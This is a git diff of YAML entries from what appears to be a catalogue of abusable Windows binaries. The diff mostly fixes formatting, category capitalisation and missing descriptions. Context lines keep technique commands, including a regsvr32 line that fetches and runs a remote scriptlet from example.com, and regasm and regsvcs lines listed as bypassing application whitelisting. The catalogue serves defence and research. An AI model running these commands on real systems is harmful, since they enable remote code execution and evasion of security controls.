Category: AWL Bypass
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
@ -33,4 +33,3 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person:
|
||||
Handle:
|
||||
---
|
||||
|
@ -69,4 +69,3 @@ Acknowledgement:
|
||||
Handle: '@subtee'
|
||||
- Person: Oddvar Moe
|
||||
Handle: '@oddvarmoe'
|
||||
---
|
||||
|
@ -51,4 +51,3 @@ Acknowledgement:
|
||||
Handle: '@netbiosX'
|
||||
- Person: Philip Tsukerman
|
||||
Handle: '@PhilipTsukerman'
|
||||
---
|
||||
|
@ -34,4 +34,3 @@ Acknowledgement:
|
||||
Handle:
|
||||
- Person: 'Xabier Ugarte-Pedrero'
|
||||
Handle:
|
||||
---
|
||||
|
@ -36,4 +36,3 @@ Acknowledgement:
|
||||
Handle: '@subtee'
|
||||
- Person: Adam
|
||||
Handle: '@Hexacorn'
|
||||
---
|
||||
|
@ -19,4 +19,3 @@ Detection:
|
||||
Acknowledgement:
|
||||
- Person: Elliot Killick
|
||||
Handle: '@elliotkillick'
|
||||
---
|
||||
|
@ -21,4 +21,3 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Elliot Killick
|
||||
Handle: '@elliotkillick'
|
||||
---
|
||||
|
@ -38,4 +38,3 @@ Acknowledgement:
|
||||
Handle: '@kylehanslovan'
|
||||
- Person: Fab
|
||||
Handle: '@0rbz_'
|
||||
---
|
||||
|
@ -22,4 +22,3 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Pierre-Alexandre Braeken
|
||||
Handle: '@pabraeken'
|
||||
---
|
||||
|
@ -31,4 +31,3 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Derek Johnson
|
||||
Handle: ''
|
||||
---
|
||||
|
@ -22,4 +22,3 @@ Acknowledgement:
|
||||
Handle: '@LuxNoBulIshit'
|
||||
- Person: Avihay eldad
|
||||
Handle: '@aloneliassaf'
|
||||
---
|
||||
|
@ -25,4 +25,3 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Casey Smith
|
||||
Handle: '@subtee'
|
||||
---
|
||||
|
@ -40,4 +40,3 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Oddvar Moe
|
||||
Handle: '@oddvarmoe'
|
||||
---
|
||||
|
@ -28,4 +28,3 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Elliot Killick
|
||||
Handle: '@elliotkillick'
|
||||
---
|
||||
|
@ -25,4 +25,3 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Leon Rodenko
|
||||
Handle: '@L3m0nada'
|
||||
---
|
||||
|
@ -24,4 +24,3 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: FireEye
|
||||
Handle: '@FireEye'
|
||||
---
|
||||
|
@ -41,4 +41,3 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Grzegorz Tworek
|
||||
Handle: '@0gtweet'
|
||||
---
|
@ -36,4 +36,3 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Oddvar Moe
|
||||
Handle: '@oddvarmoe'
|
||||
---
|
||||
|
@ -7,7 +7,7 @@ Commands:
|
||||
- Command: regasm.exe AllTheThingsx64.dll
|
||||
Description: Loads the target .DLL file and executes the RegisterClass function.
|
||||
Usecase: Execute code and bypass Application whitelisting
|
||||
Category: AWL bypass
|
||||
Category: AWL Bypass
|
||||
Privileges: Local Admin
|
||||
MitreID: T1218.009
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
@ -38,4 +38,3 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Casey Smith
|
||||
Handle: '@subtee'
|
||||
---
|
||||
|
@ -32,4 +32,3 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Oddvar Moe
|
||||
Handle: '@oddvarmoe'
|
||||
---
|
||||
|
@ -25,4 +25,3 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Eli Salem
|
||||
Handle: '@elisalem9'
|
||||
---
|
||||
|
@ -24,4 +24,3 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Philip Tsukerman
|
||||
Handle: '@PhilipTsukerman'
|
||||
---
|
||||
|
@ -14,7 +14,7 @@ Commands:
|
||||
- Command: regsvcs.exe AllTheThingsx64.dll
|
||||
Description: Loads the target .DLL file and executes the RegisterClass function.
|
||||
Usecase: Execute dll file and bypass Application whitelisting
|
||||
Category: AWL bypass
|
||||
Category: AWL Bypass
|
||||
Privileges: Local Admin
|
||||
MitreID: T1218.009
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
@ -34,4 +34,3 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Casey Smith
|
||||
Handle: '@subtee'
|
||||
---
|
||||
|
@ -7,14 +7,14 @@ Commands:
|
||||
- Command: regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll
|
||||
Description: Execute the specified remote .SCT script with scrobj.dll.
|
||||
Usecase: Execute code from remote scriptlet, bypass Application whitelisting
|
||||
Category: AWL bypass
|
||||
Category: AWL Bypass
|
||||
Privileges: User
|
||||
MitreID: T1218.010
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
- Command: regsvr32.exe /s /u /i:file.sct scrobj.dll
|
||||
Description: Execute the specified local .SCT script with scrobj.dll.
|
||||
Usecase: Execute code from scriptlet, bypass Application whitelisting
|
||||
Category: AWL bypass
|
||||
Category: AWL Bypass
|
||||
Privileges: User
|
||||
MitreID: T1218.010
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
@ -57,4 +57,3 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Casey Smith
|
||||
Handle: '@subtee'
|
||||
---
|
||||
|
@ -32,4 +32,3 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: elceef
|
||||
Handle: '@elceef'
|
||||
---
|
||||
|
@ -39,4 +39,3 @@ Acknowledgement:
|
||||
Handle: '@splinter_code'
|
||||
- Person: ap
|
||||
Handle: '@decoder_it'
|
||||
---
|
||||
|
@ -91,4 +91,3 @@ Acknowledgement:
|
||||
Handle: '@404death'
|
||||
- Person: Martin Ingesen
|
||||
Handle: '@Mrtn9'
|
||||
---
|
||||
|
@ -1,6 +1,6 @@
|
||||
---
|
||||
Name: Runonce.exe
|
||||
Description:
|
||||
Description: Executes a Run Once Task that has been configured in the registry
|
||||
Author: 'Oddvar Moe'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
@ -27,4 +27,3 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Pierre-Alexandre Braeken
|
||||
Handle: '@pabraeken'
|
||||
---
|
||||
|
@ -1,6 +1,6 @@
|
||||
---
|
||||
Name: Runscripthelper.exe
|
||||
Description:
|
||||
Description: Execute target PowerShell script
|
||||
Author: 'Oddvar Moe'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
@ -26,4 +26,3 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Matt Graeber
|
||||
Handle: '@mattifestation'
|
||||
---
|
||||
|
@ -36,4 +36,3 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Oddvar Moe
|
||||
Handle: '@oddvarmoe'
|
||||
---
|
||||
|
@ -33,4 +33,3 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person:
|
||||
Handle:
|
||||
---
|
||||
|
@ -1,6 +1,6 @@
|
||||
---
|
||||
Name: Scriptrunner.exe
|
||||
Description:
|
||||
Description: Execute binary through proxy binary to evade defensive counter measures
|
||||
Author: 'Oddvar Moe'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
@ -33,4 +33,3 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Nick Tyrer
|
||||
Handle: '@nicktyrer'
|
||||
---
|
||||
|
@ -31,4 +31,3 @@ Acknowledgement:
|
||||
Handle: '@hexacorn'
|
||||
- Person: Elliot Killick
|
||||
Handle: '@elliotkillick'
|
||||
---
|
||||
|
@ -22,4 +22,3 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Eral4m
|
||||
Handle: '@eral4m'
|
||||
---
|
||||
|
@ -25,4 +25,3 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Nick Landers
|
||||
Handle: '@monoxgas'
|
||||
---
|
||||
|
@ -35,4 +35,3 @@ Acknowledgement:
|
||||
Handle: '@oddvarmoe'
|
||||
- Person: Maxime Nadeau
|
||||
Handle: '@m_nad0'
|
||||
---
|
||||
|
@ -37,4 +37,3 @@ Acknowledgement:
|
||||
Handle: '@oulusoyum'
|
||||
- Person: Matt Graeber
|
||||
Handle: '@mattifestation'
|
||||
---
|
||||
|
@ -31,4 +31,3 @@ Acknowledgement:
|
||||
Handle:
|
||||
- Person: Hai Vaknin(Lux)
|
||||
Handle:
|
||||
---
|
||||
|